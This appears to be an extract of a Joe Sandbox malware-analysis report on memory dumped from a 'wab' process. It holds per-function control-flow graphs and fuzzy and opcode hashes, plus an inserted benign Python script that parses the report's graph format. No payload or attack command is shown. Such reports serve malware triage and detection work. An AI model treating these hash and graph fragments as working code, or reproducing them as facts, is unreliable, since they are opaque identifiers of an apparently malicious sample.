                                                • Instruction ID: 4ed720825297f7e9f840bd491d8bdd94fb7133aac02f7ffd6110ec8b52751b3d
                                                • Opcode Fuzzy Hash: 13733231e8968d49dce6fdd60f6396a6e4be3b6310528e7a208f08f8f1398ff0
                                                • Instruction Fuzzy Hash: C852C774A00219CFEB68DF64D998A9DBBB3FF88301F1045A5D909A7355DB74AE81CF80

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1242 25176f1-2517725 1243 2517b54-2517b58 1242->1243 1244 251772b-251774e 1242->1244 1245 2517b71-2517b7f 1243->1245 1246 2517b5a-2517b6e 1243->1246 1253 2517754-2517761 1244->1253 1254 25177fc-2517800 1244->1254 1251 2517b81-2517b96 1245->1251 1252 2517bf0 1245->1252 1260 2517b98-2517b9b 1251->1260 1261 2517b9d-2517baa 1251->1261 1256 2517bfa-2517c05 1252->1256 1267 2517770 1253->1267 1268 2517763-251776e 1253->1268 1257 2517802-2517810 1254->1257 1258 2517848-2517851 1254->1258 1262 2517c07-2517c0a 1256->1262 1263 2517c0c-2517c19 1256->1263 1257->1258 1274 2517812-251782d 1257->1274 1264 2517c67 1258->1264 1265 2517857-2517861 1258->1265 1269 2517bac-2517bed 1260->1269 1261->1269 1270 2517c1b-2517c56 1262->1270 1263->1270 1275 2517c6c-2517c9c 1264->1275 1265->1243 1271 2517867-2517870 1265->1271 1276 2517772-2517774 1267->1276 1268->1276 1318 2517c5d-2517c64 1270->1318 1272 2517872-2517877 1271->1272 1273 251787f-251788b 1271->1273 1272->1273 1273->1275 1281 2517891-2517897 1273->1281 1301 251783b 1274->1301 1302 251782f-2517839 1274->1302 1303 2517cb5-2517cbc 1275->1303 1304 2517c9e-2517cb4 1275->1304 1276->1254 1283 251777a-25177dc 1276->1283 1284 251789d-25178ad 1281->1284 1285 2517b3e-2517b42 1281->1285 1331 25177e2-25177f9 1283->1331 1332 25177de 1283->1332 1299 25178c1-25178c3 1284->1299 1300 25178af-25178bf 1284->1300 1285->1264 1291 2517b48-2517b4e 1285->1291 1291->1243 1291->1271 1305 25178c6-25178cc 1299->1305 1300->1305 1306 251783d-251783f 1301->1306 1302->1306 1305->1285 1312 25178d2-25178e1 1305->1312 1306->1258 1313 2517841 1306->1313 1315 25178e7 1312->1315 1316 251798f-25179ba call 2517538 * 2 1312->1316 1313->1258 1320 25178ea-25178fb 1315->1320 1333 25179c0-25179c4 1316->1333 1334 2517aa4-2517abe 1316->1334 1320->1275 1322 2517901-2517913 1320->1322 1322->1275 1323 2517919-2517931 1322->1323 1387 2517933 call 25180c9 1323->1387 1388 2517933 call 25180d8 1323->1388 1327 2517939-2517949 1327->1285 1330 251794f-2517952 1327->1330 1335 2517954-251795a 1330->1335 1336 251795c-251795f 1330->1336 1331->1254 1332->1331 1333->1285 1337 25179ca-25179ce 1333->1337 1334->1243 1354 2517ac4-2517ac8 1334->1354 1335->1336 1338 2517965-2517968 1335->1338 1336->1264 1336->1338 1341 25179d0-25179dd 1337->1341 1342 25179f6-25179fc 1337->1342 1343 2517970-2517973 1338->1343 1344 251796a-251796e 1338->1344 1357 25179ec 1341->1357 1358 25179df-25179ea 1341->1358 1346 2517a37-2517a3d 1342->1346 1347 25179fe-2517a02 1342->1347 1343->1264 1345 2517979-251797d 1343->1345 1344->1343 1344->1345 1345->1264 1352 2517983-2517989 1345->1352 1349 2517a49-2517a4f 1346->1349 1350 2517a3f-2517a43 1346->1350 1347->1346 1353 2517a04-2517a0d 1347->1353 1355 2517a51-2517a55 1349->1355 1356 2517a5b-2517a5d 1349->1356 1350->1318 1350->1349 1352->1316 1352->1320 1359 2517a1c-2517a32 1353->1359 1360 2517a0f-2517a14 1353->1360 1361 2517b04-2517b08 1354->1361 1362 2517aca-2517ad4 call 25163e0 1354->1362 1355->1285 1355->1356 1363 2517a92-2517a94 1356->1363 1364 2517a5f-2517a68 1356->1364 1365 25179ee-25179f0 1357->1365 1358->1365 1359->1285 1360->1359 1361->1318 1368 2517b0e-2517b12 1361->1368 1362->1361 1375 2517ad6-2517aeb 1362->1375 1363->1285 1366 2517a9a-2517aa1 1363->1366 1371 2517a77-2517a8d 1364->1371 1372 2517a6a-2517a6f 1364->1372 1365->1285 1365->1342 1368->1318 1373 2517b18-2517b25 1368->1373 1371->1285 1372->1371 1378 2517b34 1373->1378 1379 2517b27-2517b32 1373->1379 1375->1361 1384 2517aed-2517b02 1375->1384 1381 2517b36-2517b38 1378->1381 1379->1381 1381->1285 1381->1318 1384->1243 1384->1361 1387->1327 1388->1327
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53b881e96e5a66f1fe5dc9f8a3cb9be518164a75cac0a89f6aef9d1503890434
                                                • Instruction ID: 5f20d40fc95b1f8ba2142408ae869e6edddb56dcad2b293e692e87b873f055df
                                                • Opcode Fuzzy Hash: 53b881e96e5a66f1fe5dc9f8a3cb9be518164a75cac0a89f6aef9d1503890434
                                                • Instruction Fuzzy Hash: C4123A30A002099FEB14DF69D884EAEBBF2FF88714F148599E8559B3A1DB31ED41CB54
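The report renders each function's control-flow graph from a textual `control_flow_graph` description: a stream of basic blocks written as `<id> <start>[-<end>]`, optionally followed by `call <target> [* <count>]`, and edges written as `<src>-><dst>`. The parser below is an added example, not Joe Sandbox code; that grammar is inferred from the report text and is an assumption, as is the choice of the lowest-addressed block as the function entry. The sample input is an excerpt copied from this function's graph, including a node split across a line break the way the extracted page shows it.

```python
"""Parse the textual control_flow_graph description emitted per function by
the Joe Sandbox IDA plugin and summarise it for triage.

Added example, not Joe Sandbox code. The grammar is inferred from the report
text and is an assumption: a whitespace-separated stream of basic blocks
"<id> <start>[-<end>]" (hex addresses), each optionally followed by
"call <target> [* <count>]" clauses, and edges "<src>-><dst>".
"""
import re
from dataclasses import dataclass, field

# Excerpt copied from the report's graph for the function at 0x25176f1,
# including a node split across a line break as the extracted page shows it.
SAMPLE = """control_flow_graph 1242 25176f1-2517725 1243 2517b54-2517b58 1242->1243 1244 251772b-251774e 1242->1244
1285 2517b3e-2517b42 1312 25178d2-25178e1 1316 251798f-25179ba call 2517538 * 2 1312->1316
1323 2517919-2517931 1387 2517933 call 25180c9 1323->1387 1388 2517933 call 25180d8 1323->1388 1327
2517939-2517949 1327->1285 1387->1327 1388->1327 1354 2517ac4-2517ac8 1362 2517aca-2517ad4 call 25163e0 1354->1362"""

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_RANGE = re.compile(r"^([0-9a-fA-F]+)(?:-([0-9a-fA-F]+))?$")


@dataclass
class Block:
    node_id: int
    start: int
    end: int                                    # end address as printed by the plugin
    calls: list = field(default_factory=list)   # (target address, repeat count)
    succ: list = field(default_factory=list)    # successor node ids


@dataclass
class CFG:
    blocks: dict        # node id -> Block
    edges: list         # (src id, dst id)
    dangling: list      # edges that name an id with no block definition


def parse_cfg(text: str) -> CFG:
    tokens = text.split()       # a node broken across lines is rejoined by split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges = {}, []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = _EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        # Otherwise this must be a block definition "<id> <start>[-<end>]".
        if not tok.isdigit() or i + 1 >= len(tokens):
            raise ValueError(f"expected node id at token {i}: {tok!r}")
        m = _RANGE.match(tokens[i + 1])
        if not m:
            raise ValueError(f"bad address range after node {tok}: {tokens[i + 1]!r}")
        start = int(m.group(1), 16)
        end = int(m.group(2), 16) if m.group(2) else start
        blk = Block(int(tok), start, end)
        i += 2
        # Zero or more "call <target> [* <n>]" clauses belong to this block.
        while i + 1 < len(tokens) and tokens[i] == "call":
            target, count = int(tokens[i + 1], 16), 1
            i += 2
            if i + 1 < len(tokens) and tokens[i] == "*":
                count = int(tokens[i + 1])
                i += 2
            blk.calls.append((target, count))
        blocks[blk.node_id] = blk
    dangling = []
    for src, dst in edges:
        if src in blocks and dst in blocks:
            blocks[src].succ.append(dst)
        else:
            dangling.append((src, dst))     # excerpt or truncated graph
    return CFG(blocks, edges, dangling)


def summarize(cfg: CFG) -> dict:
    """Facts an analyst wants at a glance. Entry = lowest-addressed block
    (assumption: the plugin lists the function entry first and lowest)."""
    entry = min(cfg.blocks.values(), key=lambda b: b.start)
    call_sites = {}
    for b in cfg.blocks.values():
        for target, _count in b.calls:
            # Two blocks at one address with different targets (e.g. 2517933)
            # are the plugin's alternative resolutions of the same call site.
            call_sites.setdefault(b.start, set()).add(target)
    return {
        "blocks": len(cfg.blocks),
        "edges": len(cfg.edges),
        "entry": entry.node_id,
        "range": (entry.start, max(b.end for b in cfg.blocks.values())),
        "call_sites": {a: sorted(t) for a, t in sorted(call_sites.items())},
        "leaves": sorted(b.node_id for b in cfg.blocks.values() if not b.succ),
        "dangling": cfg.dangling,
    }


if __name__ == "__main__":
    s = summarize(parse_cfg(SAMPLE))
    print(f"entry node {s['entry']}, blocks {s['range'][0]:x}-{s['range'][1]:x}")
    for site, targets in s["call_sites"].items():
        print(f"  call site {site:x} -> {', '.join(f'{t:x}' for t in targets)}")
```

Run it on the full description of any function in the report to get the address span, the call sites and their targets, and the blocks with no successors (returns or tails); `dangling` is non-empty only when the input is an excerpt or was truncated during extraction.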

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                [Control-flow graph image: basic blocks spanning 2515f38-251625b; call sites at 2515fba (call 2515f38 / 2515f2a), 2515fe5 (call 25169a0), 2516011 (call 251af64 / 251afad) and 2516167 (call 25162f0 / 2516300); node and edge list omitted]
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf2f23b5218124fe9653d89bc6d2cc0ba04d5c98c47af4bad93e2e0d1fd97532
                                                • Instruction ID: 7e16d14a5a011d9af683a333cf66c4e5a4dbfca2dc0ce30df78991dc694aae9d
                                                • Opcode Fuzzy Hash: cf2f23b5218124fe9653d89bc6d2cc0ba04d5c98c47af4bad93e2e0d1fd97532
                                                • Instruction Fuzzy Hash: 40918B307042058FFB25AF64C898B6E7BAABFC9304F148869E4468B391DF79DC41DB95
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bba6e7170b5ea2455bf5192b1407f51e2e10827c7e876ec0976286304a80448c
                                                • Instruction ID: c7e386cdc790271df5910aa74318b4f62b90c277f4e3a01be0fd1b22be801547
                                                • Opcode Fuzzy Hash: bba6e7170b5ea2455bf5192b1407f51e2e10827c7e876ec0976286304a80448c
                                                • Instruction Fuzzy Hash: A581DE30B00506CFEB14CFA9C484A6ABBBAFF89314B158569D406D7364DB31EC01CF95
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be17788b0f475cfef0557df019ef4178d2d014ec7482a6cb39fde44fc34b5901
                                                • Instruction ID: 94b8af2cd4b9ba6a4adceb4ca2a9f9e33563302f4fc06481712a442b8fac4257
                                                • Opcode Fuzzy Hash: be17788b0f475cfef0557df019ef4178d2d014ec7482a6cb39fde44fc34b5901
                                                • Instruction Fuzzy Hash: B7811331A006059FE710CF2CC894AAABBF6FF84324F14C666D86897395D731F916CBA5
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 77bb63ce09715024cab993473a46077066c4726d8144ba62df4a53ae5049fc85
                                                • Instruction ID: 7616089167fff9a8fc27869db0db11431386c7a29192d241741f29f6ad6c2040
                                                • Opcode Fuzzy Hash: 77bb63ce09715024cab993473a46077066c4726d8144ba62df4a53ae5049fc85
                                                • Instruction Fuzzy Hash: 88713B34740A058FFB29DF68C888A6A7BE6BF89344B1505A9E816DB3B0DB74DC41CB54
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c1c08b8b2bf4090fef4c72bcf8e4600567457e8e40c92ff1a4942dcb1aad43f8
                                                • Instruction ID: 790d60ae51dc1a9b07c81a50d58fd28dd15231ae375d31536c3ec394471889d8
                                                • Opcode Fuzzy Hash: c1c08b8b2bf4090fef4c72bcf8e4600567457e8e40c92ff1a4942dcb1aad43f8
                                                • Instruction Fuzzy Hash: 8A61D274D01318DFEB14DFA5D894BAEBBB2FF88301F608529D805AB294DB396955CF40
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6033763ed4376b7a3d608c3bce064b7ee69d3308367a16e32e6732c86291de7c
                                                • Instruction ID: 51b2d57a76f91fbad2fc187932231b99b807309fde5d7104751c645c5efbbfca
                                                • Opcode Fuzzy Hash: 6033763ed4376b7a3d608c3bce064b7ee69d3308367a16e32e6732c86291de7c
                                                • Instruction Fuzzy Hash: CF519E707102059FEB00DF69C854B6ABBEAFF88314F448466E909CB391EB75DD01CBA5
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 61f61a168cc9190d17a39c457f75303357e6b4e3c44e7c3df9a292c373931caa
                                                • Instruction ID: 6e85cebe35f48c233d5c86f4f51070946be8f6d442f7d1097cd502ccd2b460cb
                                                • Opcode Fuzzy Hash: 61f61a168cc9190d17a39c457f75303357e6b4e3c44e7c3df9a292c373931caa
                                                • Instruction Fuzzy Hash: 3051A774E01218DFDB48DFA9D59499DBBF2FF89300F208169E819AB364DB31A805CF50
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 938f7301a87279c2881315500559951aa37cb0a651d2a91f67f482014fb41381
                                                • Instruction ID: 058a9c3461886d3164656a78cd273385ad71ee8f2dc25586364812bc2c1272ed
                                                • Opcode Fuzzy Hash: 938f7301a87279c2881315500559951aa37cb0a651d2a91f67f482014fb41381
                                                • Instruction Fuzzy Hash: 06519174E01218CFDB48DFA9D59499DBBF2FF89300B209069E815AB364DB35AC42CF54
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c492b5137fc9e005a6bf962004ed7f5e1291f83e18f3d0d883990ef154bed583
                                                • Instruction ID: 3fb6712877b5f1b29e4ae1952e7b51e4260d095c89a3266fc32f7dae2030cff0
                                                • Opcode Fuzzy Hash: c492b5137fc9e005a6bf962004ed7f5e1291f83e18f3d0d883990ef154bed583
                                                • Instruction Fuzzy Hash: CC41E031A01249DFEF12CFA8C848B9EBFB2FF89314F048555E815AB295D374E954CB68
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b58b9101c3f4b43dcc16011a25708f0bcb0f87313f5d05635c656c2f9b62f08
                                                • Instruction ID: 2fa02d62d1b00bf75a7f0624de1817b86154ecd56577b48a7539a220ae75cfe6
                                                • Opcode Fuzzy Hash: 1b58b9101c3f4b43dcc16011a25708f0bcb0f87313f5d05635c656c2f9b62f08
                                                • Instruction Fuzzy Hash: E141D230A003499FEB158F68C854BBABFB6FF49300F04846AE8159B291DB79DD45CFA1
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53e230346fc63ee76ffac8d8632abfbbaa07b7a33f53a82c693960ac2236e70b
                                                • Instruction ID: 4a105934f7ceccc7a992313d0cf391f312040e6d603d2eadc6d51707d0185adb
                                                • Opcode Fuzzy Hash: 53e230346fc63ee76ffac8d8632abfbbaa07b7a33f53a82c693960ac2236e70b
                                                • Instruction Fuzzy Hash: 0931F531B00324A7FF1C46A988B437EB9AABBC4284F1444B9E812D3380DFB9CC4597A5
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 69d455711e06eeb32acc8621dbb352aef661f150c95fb0251f645dcb861bdd0e
                                                • Instruction ID: 97a8ebb30aef2afdf26ffdec0d2d706e7f06e58917bed5c963f7ba239eea6ca0
                                                • Opcode Fuzzy Hash: 69d455711e06eeb32acc8621dbb352aef661f150c95fb0251f645dcb861bdd0e
                                                • Instruction Fuzzy Hash: 68317E31300109EFEB219FA5C898AAE3FA3FF88250F904459F91597284DB39DD51CFA1
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c7307f75deabfb6aaa356011d785e726649387b8d6978a0f4539e921db46385a
                                                • Instruction ID: 4e235b26fadf7fec290ad19ced2f1b362ac36a91b4c0120d291f2fd7e2778bed
                                                • Opcode Fuzzy Hash: c7307f75deabfb6aaa356011d785e726649387b8d6978a0f4539e921db46385a
                                                • Instruction Fuzzy Hash: 7D3170313102518FFB399B69C85CB3E7B67FB84611B24489AE012DB292DF2CDC80C799
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b2fbcca44123c8c8567774ed35b65dc71964472712bc98bc5ad361da2d78d72
                                                • Instruction ID: dac100269df770d7384a3fbe21068fa0f709b3f3e2534939f188b1fefab10aed
                                                • Opcode Fuzzy Hash: 5b2fbcca44123c8c8567774ed35b65dc71964472712bc98bc5ad361da2d78d72
                                                • Instruction Fuzzy Hash: 70216D313002114BFB349A65845DB7A2A9BBFC465DB148439D806CB798EFA9CC82D799
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aaed052278645bd27c5d5a19429c28e89eb136d423e2429d1a7aaacca0668b01
                                                • Instruction ID: d63091e94a92b7c19700736610e00bc21018f3e00629979ff7a58ef997388da3
                                                • Opcode Fuzzy Hash: aaed052278645bd27c5d5a19429c28e89eb136d423e2429d1a7aaacca0668b01
                                                • Instruction Fuzzy Hash: 4C2126357115118FE7259B29C46892EBBA7BFC575531448AAE816CB394CF35DC02CB80
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b21b05e7a2946fad4c637f913614dce9bb341b0b8ab2b8d9af9779ccd92569f
                                                • Instruction ID: 7a60b4ff214ec17bd12e1572b0c46904dc1f09005cacd4f2f3390b64c3be526e
                                                • Opcode Fuzzy Hash: 1b21b05e7a2946fad4c637f913614dce9bb341b0b8ab2b8d9af9779ccd92569f
                                                • Instruction Fuzzy Hash: B421A475A0011ADFDB14DB68C450AAE3BA5FB9D360F10C559DC09DB348DB35EA82CBD1
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1201f5cd76d0bfa9ca95f1f922eb1be422f0dc39a0f25f826cd7745dd742293
                                                • Instruction ID: d3c9af4d1ea7613fcd479ed64de0fbea27b7e9fd8ab5fcc87d345a60e238ff6b
                                                • Opcode Fuzzy Hash: d1201f5cd76d0bfa9ca95f1f922eb1be422f0dc39a0f25f826cd7745dd742293
                                                • Instruction Fuzzy Hash: D9319E78E11309CFDB48DFA8D59489DBBB2FF49711B20906AE819AB360DB35AD41CF40
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 70e4ea887a16301f7773a9b469e1ebf3449d41a674990bf377d64cfea9a4d1b5
                                                • Instruction ID: e951f5ab5d4e1e854ce957c89c5330be682efb923c148b22c1363736f86d49ea
                                                • Opcode Fuzzy Hash: 70e4ea887a16301f7773a9b469e1ebf3449d41a674990bf377d64cfea9a4d1b5
                                                • Instruction Fuzzy Hash: A021C2317011099FEB119F54C49876A3BA2FB84310F904469F4159B244DB3CDE51CFE1
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 727a44f22a90e0c88f4bc0ba03efd9bf5a0bbc7dcc5618061e00e49ef657dc78
                                                • Instruction ID: 93b39649dea61e861a57a326363630f43021b20255e169f430d5d8896a6c1d28
                                                • Opcode Fuzzy Hash: 727a44f22a90e0c88f4bc0ba03efd9bf5a0bbc7dcc5618061e00e49ef657dc78
                                                • Instruction Fuzzy Hash: DB219F30E012489FEB14CFA1C5A4AEDBFB6BF49214F248459E411F6290DB38E941CF60
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 06cc82820b70e52990646a1d457fedf5cf6a4549ad35da25e791e72452ee69a5
                                                • Instruction ID: d41aca35c3ad88d38bcaabaebdbfce01229629bd76a40a38b1ea639306ab3034
                                                • Opcode Fuzzy Hash: 06cc82820b70e52990646a1d457fedf5cf6a4549ad35da25e791e72452ee69a5
                                                • Instruction Fuzzy Hash: 1C11A1353116119FE7295B2AC46892EBBABBFC57A531844A8E816CB390CF35DC028B94
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8b8cc00c7d52f074e6ec80391ca8c74874b5d2245956d26819f2d17e0da6f044
                                                • Instruction ID: 734d9e33005a1d05f3f4df238be58ec4cdfc4a428184c67ff64ef77d3966fab5
                                                • Opcode Fuzzy Hash: 8b8cc00c7d52f074e6ec80391ca8c74874b5d2245956d26819f2d17e0da6f044
                                                • Instruction Fuzzy Hash: 142189B0E00349CFEB05DFA9D44079EBFB2FB85305F1086AAC154AB255EB749A068F81
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb0db69698aa6d4da779717adfb781bbdbd6137320dddb348b1a57f5b7767644
                                                • Instruction ID: 50b804e7c2c48040f183127dacc25a2b947c4a2008170c3385a332e0155856fa
                                                • Opcode Fuzzy Hash: fb0db69698aa6d4da779717adfb781bbdbd6137320dddb348b1a57f5b7767644
                                                • Instruction Fuzzy Hash: 50111C70E00309DFEB04DFA9D54079EBFF2FB84300F1085A9C118AB255EB746A458F81
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68549ce83a3b8fa1f9eda4327907bc010eb3720d88cb90db5ca568783c0525d2
                                                • Instruction ID: d06330029696280b0206615439c6638ec92657fae867f07e07cf995b252b0676
                                                • Opcode Fuzzy Hash: 68549ce83a3b8fa1f9eda4327907bc010eb3720d88cb90db5ca568783c0525d2
                                                • Instruction Fuzzy Hash: BA21C274D10209CFEB44DFA9C948AEEBBF5FB49200F10556AD805B6214EB345A85CBA0
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 195b668af2559471fcae7917193f7914985e082d3fcadc12fc956809b8603465
                                                • Instruction ID: 1b956ef11868b5e2e3a82b038d01f1fd6a53df7c8e2de2e9ea4319b52132b88d
                                                • Opcode Fuzzy Hash: 195b668af2559471fcae7917193f7914985e082d3fcadc12fc956809b8603465
                                                • Instruction Fuzzy Hash: E1019C32B001046BEB119E988C40BAF3FABEBCC740F54801AF815C3280DE358D218F94
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2634179084.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_2510000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a98d789e478bf5e79937585ad818a06c147f7840691e9496ed44c62e4786b424
                                                • Instruction ID: 56750ffeb3b5553c332df2d537657d49cd9cfb65e06b97765ff8ddba60ce075f
                                                • Opcode Fuzzy Hash: a98d789e478bf5e79937585ad818a06c147f7840691e9496ed44c62e4786b424
                                                • Instruction Fuzzy Hash: D4F096317016104BA7275A2E9458E2ABADEFFC8A5D755407AF909C7361EF25CC03C794
                                                Memory Dump Source
